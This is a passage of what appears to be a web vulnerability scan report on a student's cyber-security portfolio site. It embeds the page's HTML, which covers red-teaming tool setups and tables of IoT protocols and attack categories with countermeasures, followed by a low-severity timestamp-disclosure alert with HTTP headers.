          <p>On the road when I'm on my laptop I like to use Kali Linux. It's just convenient that it
          comes pre-loaded with all the tools you need, and it runs fairly lightweight on older
          laptops. The "kali-undercover" command is also a fun little gimmick that changes your
          Kali desktop to a Windows clone which for a random passer by looks just like a regular
          Windows machine. Making it incognito to use Kali whenever you're in a public space and
          want to keep a low profile.</p>
          <h3>At home</h3>
          <a href="img/portfolio/minor/red/parrotos.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/parrotos.jpg" alt=""></a>
          <p>At home on my main desktop PC I recently switched to natively running ParrotOS. This was
          because I liked to try something new and the reviews were good. It comes pre-loaded with
          the same tools as kali and a few extra tools like diverting all traffic trough tor
          making the machine even more anonymous. The user experience is a little better and just
          overall a good looking distro. This comes at a cost because it takes more resources to
          run. This isn't a problem on my PC because it's quite powerful and I don't have to think
          about battery life. Alongside ParrotOS I run a Windows VM in qemu with WinApps running
          on Linux which enables me to run any Windows application I want on Linux. I mostly use
          it for Microsoft Office products.</p>
          <h3>Cloud</h3>
          <a href="img/portfolio/minor/red/googlecloudconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/googlecloudconsole.PNG" alt=""></a>
          <p>Google cloud console is an awesome way to always have a Linux machine at your disposal
          where ever you are. It's fully cloud based and free to use. So when you're in need of a
          Linux terminal and you have access to a browser you're set. The only downside is that
          the machine is volatile so when you shut it down it is gone. This requires you to always
          re-install tools and such. Luckily due to it running on Google cloud it is pretty fast.
          Just overall a good tool to know about.</p>
          <a href="img/portfolio/minor/red/guacamole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamole.PNG" alt=""></a>
          <p>Now Guacamole is kinda like Google cloud console, but it's self-hosted. It can turn any
          machine with a SSH server into a cloud based web terminal accessible from any browser
          where ever you are. It takes a little time and effort to set it up but it is worth it.
          All the benefits from Google cloud console but your data is hosted by you and it is
          saved. In my case I installed Kali Linux on a docker server and now I can access it
          whenever I need to it doesn't matter if I'm on Windows, Linux or even my phone.</p>
          <a href="img/portfolio/minor/red/guacamoleconsole.PNG"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/guacamoleconsole.PNG" alt=""></a>
          <h3>Windows</h3>
          <a href="img/portfolio/minor/red/wsl.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/wsl.jpg" alt=""></a>
          <p>Whenever I'm using Windows and need to do a quick little task that requires Linux I don't
          want to reboot and boot into Linux because it's a hassle. That's when I use WSL. WSL
          stands for Windows Subsystem for Linux and it works great. It's not everything for
          example network related stuff is not possible due to WSL not having direct access to the
          network card but for other simple stuff it works great. And if I need to do a quick
          little scan I can use the Windows version of NMap. And if I need a little more
          functionality I can always use the before mentioned Guacamole to have instant access to
          a fully functional Kali instance in my browser.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal26" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Security of IOT protocols and technology</p>
          <p>Nowadays more and more people have their home filled with smart devices. Almost
          everything is smart in some way. Which creates new problems like security. These
          products weren't made with security in mind, on the contrary, they were made to be cheap
          and easy to use for people without IT knowledge.</p>
          <p>This causes IOT products to be, the most of the time, the weakest link in someones
          network. But IOT is here to stay and it is improving fast so let's take a look at some
          common security protocols.</p>
          <table>
          <tr>
          <th>Protocol</th>
          <th>Feature</th>
          <th>TCP/UDP</th>
          <th>Security</th>
          </tr>
          <tr>
          <td>LOWPAN</td>
          <td>WPANs to maintain an IPv6 network</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>MQTT</td>
          <td>To utilize the publish/subscribe pattern to provide transition flexibility and
          simplicity of implementation
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>AMQP</td>
          <td>To provide publish-subscribe and point-to point communication</td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>CoAP</td>
          <td>To connect resource-constrained devices in a secure and reliable way</td>
          <td>UDP</td>
          <td>DTLS</td>
          </tr>
          <tr>
          <td>XMPP</td>
          <td>To transfer instant messaging (IM) standard that is used for multi-party
          chatting, voice and video calling and telepresence
          </td>
          <td>TCP</td>
          <td>SSL</td>
          </tr>
          <tr>
          <td>DSS</td>
          <td>To enable scalable, real-time, dependable, high-performance and interoperable
          data exchanges using a publish–subscribe pattern
          </td>
          <td>TCP/UDP</td>
          <td>SSL</td>
          </tr>
          </table>
          <p>To show the security flaws in IOT devices</p>
          <table>
          <thead>
          <tr class="rowsep-1 valign-top">
          <th scope="col">Layers</th>
          <th scope="col">Attacks</th>
          <th scope="col">Issues</th>
          <th scope="col">Control Measures</th>
          </tr>
          </thead>
          <tbody>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Perception</td>
          <td class="align-left">Hardware Tempering</td>
          <td class="align-left">Data Leakage (Keys, Routing Tables, Etc)</td>
          <td class="align-left">Secure Physical Design</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Fake Node Injection</td>
          <td class="align-left">Fake Data Manipulation</td>
          <td class="align-left">Secure Booting</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Code Injection</td>
          <td class="align-left">Halt Transmission</td>
          <td class="align-left">Intrusion Detection Technology (IDT)</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sleep Denial Attack</td>
          <td class="align-left">Node Shutdown</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">WSN Node Jamming</td>
          <td class="align-left">Jam Node Communication</td>
          <td class="align-left">IPSec Security Channel</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RF Interference Of RFID</td>
          <td class="align-left">Distortion In Node Communication</td>
          <td class="align-left">Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="12">Network</td>
          <td class="align-left">Traffic Analysis Attacks</td>
          <td class="align-left">Data Leakage (About Network)</td>
          <td class="align-left">Routing Security</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Spoofing</td>
          <td class="align-left">Intrusion In Network Data Manipulation</td>
          <td class="align-left">GPS Location System</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">RFID Unauthorized Access</td>
          <td class="align-left">Node Data Can Be Modified (Read, Write &amp; Delete)</td>
          <td class="align-left">Network Authentication</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Sinkhole Attack</td>
          <td class="align-left">Data Leakage (Data Of The Nodes)</td>
          <td class="align-left">Security Aware Ad Hoc Routing</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Man In The Middle Attack</td>
          <td class="align-left">Data Privacy Violation</td>
          <td class="align-left">Point-To-Point Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Routing Information Attack</td>
          <td class="align-left">Routing Loops (Network Destruction)</td>
          <td class="align-left">Encrypting Routing Tables</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Application Security</td>
          <td class="align-left">Privacy Violation</td>
          <td class="align-left">Web Application Scanner</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Security</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Homomorphic Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Underlying Infrastructure Security</td>
          <td class="align-left">Service Hijacking</td>
          <td class="align-left">Fragmentation Redundancy Scattering</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Third-Party Relationships</td>
          <td class="align-left">Data Leakage (User Data On Cloud)</td>
          <td class="align-left">Encryption</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Shared Resources</td>
          <td class="align-left">Resources Destruction</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Virtualization Threats</td>
          <td class="align-left">Resources Theft</td>
          <td class="align-left">Hyper Safe</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left" rowspan="6">Application</td>
          <td class="align-left">Phishing Attacks</td>
          <td class="align-left">Data Leakage (User Credentials Data)</td>
          <td class="align-left">Biometrics Authentication</td>
          </tr>
          <tr class="valign-top">
           <td class="align-left">Virus, Worms, Trojan Horse, Spyware</td>
          <td class="align-left">Resource Destruction &amp; Hijacking</td>
          <td class="align-left">Protective Software</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Malicious Scripts</td>
          <td class="align-left">Hijacking</td>
          <td class="align-left">Firewalls</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Denial Of Service</td>
          <td class="align-left">Resource Destruction</td>
          <td class="align-left">Access Control Lists</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Data Protection And Recovery</td>
          <td class="align-left">Data Loss &amp; Catastrophic Damage</td>
          <td class="align-left">Cryptographic Hash Functions</td>
          </tr>
          <tr class="valign-top">
          <td class="align-left">Software Vulnerabilities</td>
          <td class="align-left">Buffer Over Flow</td>
          <td class="align-left">Awareness Of Security</td>
          </tr>
          </tbody>
          </table>
          <a href="https://www.sciencedirect.com/science/article/pii/S108480452030237X#sec3">Source</a>
          <p>As seen in this article there are a lot of different vulnerabilities in IOT devices. And
          not all of them can be solved with just a good security protocol.</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: November 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal27" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
           </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal28" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal29" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal30" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal31" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal23" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
           </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal33" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal34" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal35" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal36" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal37" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal38" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal39" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal40" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">EMPLOYER</h2>
          <p class="item-intro text-muted">TITLE GOES HERE</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
           <li>Date: DATE</li>
          <li>Client: CLIENT</li>
          <li>Category: CATEGORY</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"></script><script src="vendor/jquery/jquery.min.js"></script>
          <script src="vendor/bootstrap/js/bootstrap.bundle.min.js"></script>
          
          <script src="vendor/jquery-easing/jquery.easing.min.js"></script>
          
          <script src="js/jqBootstrapValidation.js"></script>
          <script src="js/contact_me.js"></script>
          
          <script src="js/agency.min.js"></script>
          
          <script src="https://cdn.jsdelivr.net/gh/google/code-prettify@master/loader/run_prettify.js"></script>
          </body>
          </html>
          
          Evidence
          254375293
          Solution

          Manually confirm that the timestamp data is not sensitive, and that the data cannot be aggregated to disclose exploitable patterns.

        20. GET https://beekmans.dev/
          Alert tags
          Alert description

          A timestamp was disclosed by the application/web server - Unix

          Other info

          257747436, which evaluates to: 1978-03-03 05:30:36

          Request
          Request line and header section (224 bytes)
          GET https://beekmans.dev/ HTTP/1.1
          Host: beekmans.dev
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
          Pragma: no-cache
          Cache-Control: no-cache
          Referer: https://beekmans.dev
          
          
          Request body (0 bytes)
          Response
          Status line and header section (1039 bytes)
          HTTP/1.1 200 OK
          Date: Mon, 06 Dec 2021 09:55:13 GMT
          Content-Type: text/html; charset=UTF-8
          Connection: keep-alive
          vary: Accept-Encoding
          content-security-policy: default-src 'self' http: https: data: blob: 'unsafe-inline'
          x-frame-options: SAMEORIGIN
          x-xss-protection: 1; mode=block
          x-content-type-options: nosniff
          referrer-policy: no-referrer-when-downgrade
          strict-transport-security: max-age=31536000; includeSubDomains; preload
          CF-Cache-Status: DYNAMIC
          Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=O9CfHQgObVNEaGCeR54qKKwytECMmlM5H0bXWDqJpVGo4vNUT18M2ld9NoeIDxTsPe1bzHv%2F9eh3xB7p6KNQNXYdikH5v2vQoVZ4Lqr2%2BgmRM8bXQ1W95L9VnzmijHE%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 6b94a326098f0c09-AMS
          alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
          
          
          Response body (178339 bytes)
          <!DOCTYPE html>
          <html lang="en">
          <head>
          <meta charset="utf-8">
          <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
          <meta name="description" content="">
          <meta name="author" content="">
          <title>Cyber portfolio</title>
          
          <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">
          
          <link href="vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
          <link href="https://fonts.googleapis.com/css?family=Montserrat:400,700" rel="stylesheet" type="text/css">
          <link href='https://fonts.googleapis.com/css?family=Kaushan+Script' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Droid+Serif:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
          <link href='https://fonts.googleapis.com/css?family=Roboto+Slab:400,100,300,700' rel='stylesheet' type='text/css'>
          
          <link href="css/agency.min.css" rel="stylesheet">
          </head>
          <body id="page-top">
          
          <nav class="navbar navbar-expand-lg navbar-dark fixed-top" id="mainNav">
          <div class="container">
          <a class="navbar-brand js-scroll-trigger" href="#page-top">Cyber security</a>
          <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
          Menu
          <i class="fas fa-bars"></i>
          </button>
          <div class="collapse navbar-collapse" id="navbarResponsive">
          <ul class="navbar-nav text-uppercase ml-auto">
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#services">Services</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#portfolio">Portfolio</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#about">About</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#team">Team</a>
          </li>
          <li class="nav-item">
          <a class="nav-link js-scroll-trigger" href="#contact">Contact</a>
          </li>
          </ul>
          </div>
          </div>
          </nav>
          
          <header class="masthead">
          <div class="container">
          <div class="intro-text">
          <div class="intro-lead-in">Welcome To My Portfolio!</div>
          <div class="intro-heading text-uppercase">It's Nice To Meet You</div>
          <a class="btn btn-primary btn-xl text-uppercase js-scroll-trigger" href="#services">Tell Me More</a>
          </div>
          </div>
          </header>
          
          <section id="services">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Introduction</h2>
          <h3 class="section-subheading text-muted">My project.</h3>
          </div>
          </div>
          <div class="row text-center">
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-shopping-cart fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Environment</h4>
          <p class="text-muted">I'm using my own Hyper visor (Microsoft's Hyper-V) on a private server in my home. I can connect via a VPN that's also running on this server to my home network to remotely manage the server and manage and deploy VM's. The server is an old DELL T310 with a Xeon x3440, 24GB ddr3 registered ecc 1333mhz memory and all VM's are installed on a Crucial MX500 ssd. The server is part of the home network just like every other computer in my home.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-laptop fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Context</h4>
          <p class="text-muted">The network I'm building has as focus a webhosting company with some onsite employee's maybe a place for guests and some webservers hosting different websites.</p>
          </div>
          <div class="col-md-4">
          <span class="fa-stack fa-4x">
          <i class="fas fa-circle fa-stack-2x text-primary"></i>
          <i class="fas fa-lock fa-stack-1x fa-inverse"></i>
          </span>
          <h4 class="service-heading">Security</h4>
          <p class="text-muted">The network is secured by separating the webservers from the employees and guests on their own VLAN. The network is protected by a pfsense router running custom firewalls for every interface and running Surricata to identify and block possible threats.</p>
          </div>
          </div>
          </div>
          </section>
          
          <section class="bg-light" id="portfolio">
          <div class="container">
          <div class="row">
          <div class="col-lg-12 text-center">
          <h2 class="section-heading text-uppercase">Portfolio</h2>
          <h3 class="section-subheading text-muted">Cyber security.</h3>
          </div>
          </div>
          <div class="row">
          <div class="col-lg-12 text-center">
          <h4 class="section-subheading text-muted">Blue teaming semester</h4>
          </div>
          </div>
          <div class="row">
          <div class="col-md-4 col-sm-6 portfolio-item">
          <a class="portfolio-link" data-toggle="modal" href="#portfolioModal1">
          <div class="portfolio-hover">
          <div class="portfolio-hover-content">
          <i class="fas fa-plus fa-3x"></i>
          </div>
          </div>
          <img class="img-fluid" src="img/portfolio/blue/01-thumbnail.png" alt="">
          </a>
          <div class="portfolio-caption">
